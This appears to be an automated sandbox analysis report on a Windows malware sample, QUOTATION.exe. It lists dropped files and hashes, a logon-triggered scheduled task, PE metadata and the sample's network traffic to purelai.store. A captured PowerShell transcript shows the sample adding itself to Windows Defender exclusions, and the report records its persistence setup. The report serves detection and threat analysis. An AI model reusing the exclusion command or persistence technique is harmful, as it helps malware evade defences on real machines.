                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):22272
                  Entropy (8bit):5.602934150606012
                  Encrypted:false
                  SSDEEP:384:vtCDLC0ma0M1D93bD3RYSBKnMjultI+77Y9g9SJ3xOT1Ma7ZlbAV79W07a5ZBDIL:QlBRu4KMClthf9cUCafw5iVA
                  MD5:590EFBC148FE68AA56C46E9E0FF3D7F0
                  SHA1:2690E695521BFA00E6989969BC9FB0F97E493A40
                  SHA-256:76F88D68E1EA3A3ACD8D130BDDCD5BB271D687693FE920AE14F5DE3A51453511
                  SHA-512:8AAA5F6D4B3AC305D3C0C984667BDC2805CBA4F53A51052589FBFA615BB1EE05CE82891919B57FE5214735DA8A41CE1EDD33BEDE40FFB13AE9F350A7613A93A5
                  Malicious:false
                  Preview: @...e...........y.......h.s...............J..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nyncxzs.h2v.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oorirpyr.0hv.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1600
                  Entropy (8bit):5.152736432421442
                  Encrypted:false
                  SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtETxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTqv
                  MD5:3CE40204A917DE9C82B360734EE652AA
                  SHA1:78B42098FA8623993EF52FEAFC39CC252BBEB99F
                  SHA-256:99E8226821AC5FF2A5871E172ED6501E3D291329979B9B81850DE9718A24898E
                  SHA-512:52B54CAD11E53A99187BC9A81C5373BEC09D0E6D2A089476B08EEE3C08A75D7632AC0571CE506DEA502A021E1B94267807E6F7A93B8D902AC50B644CE763B029
                  Malicious:true
                  Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):684032
                  Entropy (8bit):7.840372839503771
                  Encrypted:false
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  MD5:213D8FD4B74E3B1122CFC1A9159AA579
                  SHA1:3FCEA21CA260C922F371877BEF1CEC0B2293F1E9
                  SHA-256:696BA286FA1D2D46B09DEE92733F9CA34BFE3E58F50A440A3EC89F63BBA76441
                  SHA-512:63E80F3DB6DD6130E20010841BE8C6449974FF7DA333BC692AC2F226A12339E7A6B79111CFBB6A5FB3E73D8FF6C2653E2CA664CA1347B04FC639ABB18C94C0A9
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 18%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d.............. ........@.. ....................................@.................................x...O.......@............................................................................ ............... ..H............text....b... ...d.................. ..`.rsrc...@............f..............@..@.reloc...............n..............@..B........................H.......p>...F......Z...@...8............................................0..7..........=...%....r...p.......%.r...p.%.r9..p.%...(......+..*".(.....*&.(......**..(......*....(......*....(......*....0............d.......{......o.......+..*....0..3.........{....s.......o......(I.....,..rK..psO...z..}....*..0............o......0..o......0..o.....2..o.......+....,..r...pr...ps....z.o.......o....ZX..{...........,..r5..ps....z..{....o.....+_..( .........oL...........,B..{.......s/..
                  C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe:Zone.Identifier
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview: [ZoneTransfer]....ZoneId=0
                  C:\Users\user\Documents\20211202\PowerShell_transcript.609290.OySUyLIk.20211202195435.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):5801
                  Entropy (8bit):5.412304632720399
                  Encrypted:false
                  SSDEEP:96:BZ2hONGqDo1Z6Z2hONGqDo1ZVt31jZThONGqDo1ZxV8FFBZK:Sl
                  MD5:D457A5A89526EB2350FDE3583929DE9B
                  SHA1:450067DCFCB07C3E3B2F63067C9D83E0268BB9EC
                  SHA-256:B563FCC5EF242AFB3A95F52F69B4036FCFBFA64AAE1097F162A8D6EA59C55AA2
                  SHA-512:27D8CCE47162FB100FD3A48E0BCBE935F8333A149E4E0B2E8976DAA1BCF4AB86D39671B6A9162DAE0129FD2AE5F395D35FC261BF27F3EB35F7DE55D2C11B15C8
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202195436..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 609290 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..Process ID: 7120..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202195436..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe..**********************..Windows PowerShell transcript start..Start time: 20211202195810..Username: computer\user..RunAs User: DESKTOP-716T77

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.840372839503771
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:QUOTATION.exe
                  File size:684032
                  MD5:213d8fd4b74e3b1122cfc1a9159aa579
                  SHA1:3fcea21ca260c922f371877bef1cec0b2293f1e9
                  SHA256:696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
                  SHA512:63e80f3db6dd6130e20010841be8c6449974ff7da333bc692ac2f226a12339e7a6b79111cfbb6a5fb3e73d8ff6c2653e2ca664ca1347b04fc639abb18c94c0a9
                  SSDEEP:12288:08wTa6ognvmGIhhzDliENR+jr2UqHblHnxAEONziF7rCAoNc+2ZYSkB:lEROGQzPNRErGJHpSzryTZ7M
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F .a..............0..d............... ........@.. ....................................@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4a82ca
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A82046 [Thu Dec 2 01:24:22 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa82780x4f.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x640.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000xa62d00xa6400False0.913712993421data7.84988973797IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0xaa0000x6400x800False0.34619140625data3.51366794109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0xaa0900x3b0data
                  RT_MANIFEST0xaa4500x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyrightCopyright Mogens Heller Grabe 2010
                  Assembly Version1.0.0.0
                  InternalNameAppDomainInitializerIn.exe
                  FileVersion1.0.0.0
                  CompanyNameMookid8000
                  LegalTrademarks
                  Comments
                  ProductNameTypedFactoryTjek
                  ProductVersion1.0.0.0
                  FileDescriptionTypedFactoryTjek
                  OriginalFilenameAppDomainInitializerIn.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 19:55:56.321921110 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.511965990 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.512080908 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.512226105 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.701594114 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711364031 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711425066 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711478949 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711519003 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711551905 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711554050 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.711579084 CET8049786208.51.62.42192.168.2.3
                  Dec 2, 2021 19:55:56.711585999 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.711674929 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.712698936 CET4978680192.168.2.3208.51.62.42
                  Dec 2, 2021 19:55:56.902086973 CET8049786208.51.62.42192.168.2.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 19:55:56.287297010 CET5213053192.168.2.38.8.8.8
                  Dec 2, 2021 19:55:56.309746027 CET53521308.8.8.8192.168.2.3
                  Dec 2, 2021 19:56:39.064629078 CET5652753192.168.2.38.8.8.8
                  Dec 2, 2021 19:56:39.208022118 CET53565278.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Dec 2, 2021 19:55:56.287297010 CET192.168.2.38.8.8.80x7ccdStandard query (0)www.purelai.storeA (IP address)IN (0x0001)
                  Dec 2, 2021 19:56:39.064629078 CET192.168.2.38.8.8.80x35ecStandard query (0)www.archedbeautynw.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Dec 2, 2021 19:55:56.309746027 CET8.8.8.8192.168.2.30x7ccdNo error (0)www.purelai.storepurelai.storeCNAME (Canonical name)IN (0x0001)
                  Dec 2, 2021 19:55:56.309746027 CET8.8.8.8192.168.2.30x7ccdNo error (0)purelai.store208.51.62.42A (IP address)IN (0x0001)
                  Dec 2, 2021 19:56:39.208022118 CET8.8.8.8192.168.2.30x35ecNo error (0)www.archedbeautynw.com192.185.0.218A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.purelai.store

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349786208.51.62.4280C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 2, 2021 19:55:56.512226105 CET7959OUTGET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1
                  Host: www.purelai.store
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 19:55:56.711364031 CET7960INHTTP/1.1 200 OK
                  Date: Thu, 02 Dec 2021 18:55:56 GMT
                  Server:
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  X-Content-Type-Options: nosniff
                  Content-Length: 5855
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 36 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 36 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 69 6d 61 67 65 73 2f 73 74 79 6c 65 2e 69 65 37 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 69 6d 61 67 65 73 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 62 72 20 2f 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 39 43 38 39 35 30 3b 20 22 3e 20 70 75 72 65 6c 61 69 2e 73 74 6f 72 65 20 3c 2f 64 69 76 3e 20 20 3c 62 72 20 2f 3e 3c 64 69 76 20 69 64 3d 22 61 72 74 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 62 6c 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <title>purelai.store</title> <link rel="stylesheet" href="images/style.css" type="text/css" media="screen" /> ...[if IE 6]><link rel="stylesheet" href="images/style.ie6.css" type="text/css" media="screen" /><![endif]--> ...[if IE 7]><link rel="stylesheet" href="images/style.ie7.css" type="text/css" media="screen" /><![endif]--> <script type="text/javascript" src="images/script.js"></script></head><body><br /><div style=" text-align:center; font-size:30px; color: #9C8950; "> purelai.store </div> <br /><div id="art-main"> <div class="art-sheet"> <div class="art-sheet-tl"></div> <div class="art-sheet-tr"></div> <div class="art-sheet-bl"></div> <div cla
                  Dec 2, 2021 19:55:56.711425066 CET7961INData Raw: 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 62 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 73 68 65 65 74 2d 74 63 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: ss="art-sheet-br"></div> <div class="art-sheet-tc"></div> <div class="art-sheet-bc"></div> <div class="art-sheet-cl"></div> <div class="art-sheet-cr"></div> <div class="art-sheet-cc">
                  Dec 2, 2021 19:55:56.711478949 CET7963INData Raw: 61 73 73 3d 22 61 72 74 2d 6c 61 79 6f 75 74 2d 63 65 6c 6c 20 61 72 74 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 72 74 2d 70 6f 73
                  Data Ascii: ass="art-layout-cell art-content"> <div class="art-post"> <div class="art-post-body"> <div class="art-post-inner art-article"><br /><br />
                  Dec 2, 2021 19:55:56.711519003 CET7964INData Raw: 63 65 3d 22 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 3e 3c 73 74 72 6f 6e 67 3e 3c 66 6f 6e 74 20 73 69 7a 65 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: ce="Verdana, Arial, Helvetica, sans-serif"><strong><font size="1"> </font></strong></font></p> </form></center><br /><br /><br /><br />
                  Dec 2, 2021 19:55:56.711551905 CET7965INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64
